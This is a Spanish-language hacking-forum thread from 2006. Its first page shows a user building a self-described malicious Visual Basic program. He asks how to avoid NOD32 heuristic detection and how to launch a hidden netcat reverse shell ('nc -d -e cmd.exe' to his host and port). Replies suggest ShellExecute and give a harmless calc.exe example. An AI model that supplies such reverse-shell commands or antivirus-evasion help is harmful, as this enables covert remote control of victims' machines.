elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Porblema con Shell
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Porblema con Shell  (Leído 4,079 veces)


Desconectado Desconectado

Mensajes: 944


en la cuna !!


Ver Perfil WWW
Porblema con Shell
« en: 5 Junio 2006, 18:35 pm »

Buenas pues stoy escribiendo una app ..en vb..jeje, no es un trojan, pero si maliciosa XDDD  decir que es indetectable...hasta el momento en que ponga en el codigo ( en cualkier parte , x lo menos de las que lo he puesto) Shell, como ponga shell en cualquier parte del codec...inluc esto señores... Shell ("calc").....ya salta el nod32 cuando voy a compilar y lo detecta como nuevo virus por heruistica....ya digo...hasta si pongo que ejeucte la calculadora como ejemplo lo detcta...( lo puse para probar y canta nod32 )..no se porque si pongo simplmente Shell n la parte que sea del codec me lo detecta nod32...mientras no ponga shell sigue siendo indetectable...alguien tiene una idea de que pueda ser.............yo...estoy trabao. salu2.


En línea

el tiempo pondrá a cada uno en su lugar
LuckyMonkey

Desconectado Desconectado

Mensajes: 41


SCS (Simio Con Suerte)


Ver Perfil
Re: Porblema con Shell
« Respuesta #1 en: 5 Junio 2006, 18:58 pm »

prueba con shellexecute y a una mala createprocess


En línea

Mira!! detrás de ti!! un mono de tres cabezas!!


Desconectado Desconectado

Mensajes: 944


en la cuna !!


Ver Perfil WWW
Re: Porblema con Shell
« Respuesta #2 en: 5 Junio 2006, 19:03 pm »

 :huh: LuckyFox: no entendiste esto: y una mala createprocess  :huh: disuclpame pero no entiendo que quieres decir...y una duda..lo que quiero ejecutar con shell es netcat + cmd seria una sintasis haci con shell ("cmd.exe /c winnc -d -e cmd.exe mihost miport"), vbHide ....podria hacer eso.....pero..como tú dices, con shellexecute ? ( tb oculto..como el vbhide de shell )..si es asi dimelo...porque me hibas ha ayudar un huevo, thanks man. espero respuesta, salu2.
En línea

el tiempo pondrá a cada uno en su lugar


Desconectado Desconectado

Mensajes: 944


en la cuna !!


Ver Perfil WWW
Re: Porblema con Shell
« Respuesta #3 en: 5 Junio 2006, 20:24 pm »

 :huh: Nadie me puede ayudar con eso ?
En línea

el tiempo pondrá a cada uno en su lugar
WarGhost
I love basket


Desconectado Desconectado

Mensajes: 1.070



Ver Perfil WWW
Re: Porblema con Shell
« Respuesta #4 en: 5 Junio 2006, 21:17 pm »

puedes usar shellexecute pero ami no me salta con shell o prueva escriptado el programa que quieras ejecutar.

;D Salu2, WarGhost
En línea

_Sergi_


Desconectado Desconectado

Mensajes: 842



Ver Perfil
Re: Porblema con Shell
« Respuesta #5 en: 5 Junio 2006, 23:46 pm »

Intenta estructurar un poquito tus post. Ya sabes, párrafos, comas, palabras completas... y esas cosas. ¡Así es más fácil ayudarte!

En primer lugar es difícil que por usar esa instrucción te salte el Nod32 Antivirus...... Shell no es una instrucción intrínsecamente maligna. Me explico mejor... si yo creo ahora un proyecto en VB, hago un  botón, y escribo
 
Código:
Shell("calc.exe")
... el Nod32 Antivirus no va a saltar. (Obviamente)

Por tanto el problema está en el resto de tu código. Quizás en ese contexto Shell haga saltar al antivirus. En ese caso, cambiar esta instrucción por otra no solucionaría el problema, por lo menos tal y como yo lo entiendo.

Un saludo!


En línea

Proyecto de Ingeniero


Desconectado Desconectado

Mensajes: 944


en la cuna !!


Ver Perfil WWW
Re: Porblema con Shell
« Respuesta #6 en: 6 Junio 2006, 02:36 am »

_Sergi_...si gracias man no tomes a mal lo que te voy a decir..mi ortografia no sera buena pero mas que sea es legible ;) esa es una, la 2ª es que ya se que shell no es una instruccion como tú dices maligna , la he usado muchas veces...amigo..simplemente dije que si pongo en cualquier parte del codigo shell...me lo detecta como virus..sino lo pongo no la detecta..dije,...no se que podra ser..por eso mismo..no se con que parte del codigo puede estar relacionando nod32 esa isntrcuion ( shell ) como brusca, peligrosa como quieras decirlo, pero muchas garcias man, no más si me molesto lo de la ortagrafia...man te aseguro que en este foro cuando me registre por primera vez habia que descifrar mis post ;) y creo que he dado un cambio, no seas " tan duro", más fácil, si me quieres ayudar :) perfecto pero no..me intentes..como castigar..buscandome el fallo :) nunca yo te he echo ni a nadie, no mas diciendote lo que pienso aparte del tema de lo que va el post, te lo digo pa que lo sepas porque no soy de esas señoritas que van diciendo por detras yo te lo digo ati para que tú lo leas y ya te dije de buen royo todo esto..pero no me trates como bobo men :), thanks por los consejos y salu2.
« Última modificación: 6 Junio 2006, 02:42 am por AililiA » En línea

el tiempo pondrá a cada uno en su lugar
_Sergi_


Desconectado Desconectado

Mensajes: 842



Ver Perfil
Re: Porblema con Shell
« Respuesta #7 en: 6 Junio 2006, 03:04 am »

Citar
te lo digo pa que lo sepas porque no soy de esas señoritas que van diciendo por detras yo te lo digo ati para que tú lo leas y ya te dije de buen royo todo esto..pero no me trates como bobo men
Gracias por decirlo; que sepas que mi intención no era ni mucho menos tratarte como bobo; aún asi perdona si lo hice.

Volviendo a tu pregunta, si quieres en vez de Shell puedes usar la API ShellExecute.

Por ejemplo, imagina que quiero ejecutar la calculadora de Windows al cargarse el formulario. El código sería algo así

Código:
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Const SW_SHOWNORMAL = 1
Private Sub Form_Load()
ShellExecute Me.hwnd, vbNullString, "C:\WINDOWS\CALC.EXE", vbNullString, "C:\", SW_SHOWNORMAL
End Sub

Saludos y espero que el antivirus no te salte más!  ;)
En línea

Proyecto de Ingeniero


Desconectado Desconectado

Mensajes: 944


en la cuna !!


Ver Perfil WWW
Re: Porblema con Shell
« Respuesta #8 en: 6 Junio 2006, 17:28 pm »

_Sergi_:

okis perfecto, no pasa na man ;), a lo de usar ShellExecute bien, pero podria tú cres ejecutar esto: (con esa api) nc.exe -d -e cmd.exe mi host miport ??? podria..se que tb se puede ocultar con SW_HIDE o con 0 pero eso...puedo? es que no me hago la idea de como seria...como yo lo intente no anda, quiero decir que no ejecuta netcat + parametros + cmd...no me lo deja preparado :P , pero si ejecuto cmd....lo corre en modo oculto , lo mismo para el netcta pero como te dije lo que yo quiero no, o alomejor lo hago mal la sintasis ;) bueno .salu2. Muchas gracias man.
En línea

el tiempo pondrá a cada uno en su lugar
_Sergi_


Desconectado Desconectado

Mensajes: 842



Ver Perfil
Re: Porblema con Shell
« Respuesta #9 en: 6 Junio 2006, 18:07 pm »

Postea el código que usaste para ver donde puede estar el error

Saludos
En línea

Proyecto de Ingeniero
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Resolver un porblema que no encuentro
Programación C/C++
Meta 5 2,568 Último mensaje 2 Mayo 2011, 14:12 pm
por Meta
Porblema con CS 1.6 No Steam
Juegos y Consolas
Caster 3 3,691 Último mensaje 29 Enero 2012, 18:26 pm
por Caster
Porblema con Troyano URGENTE!
Análisis y Diseño de Malware
Snips3000 3 2,594 Último mensaje 22 Julio 2014, 13:09 pm
por r32
Porblema con la BIOS de win 8.1
Windows
AlexKurban 3 2,547 Último mensaje 4 Enero 2015, 21:02 pm
por __LoG26
Porblema con table
Programación General
andrestr93 0 1,897 Último mensaje 17 Agosto 2019, 14:43 pm
por andrestr93
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines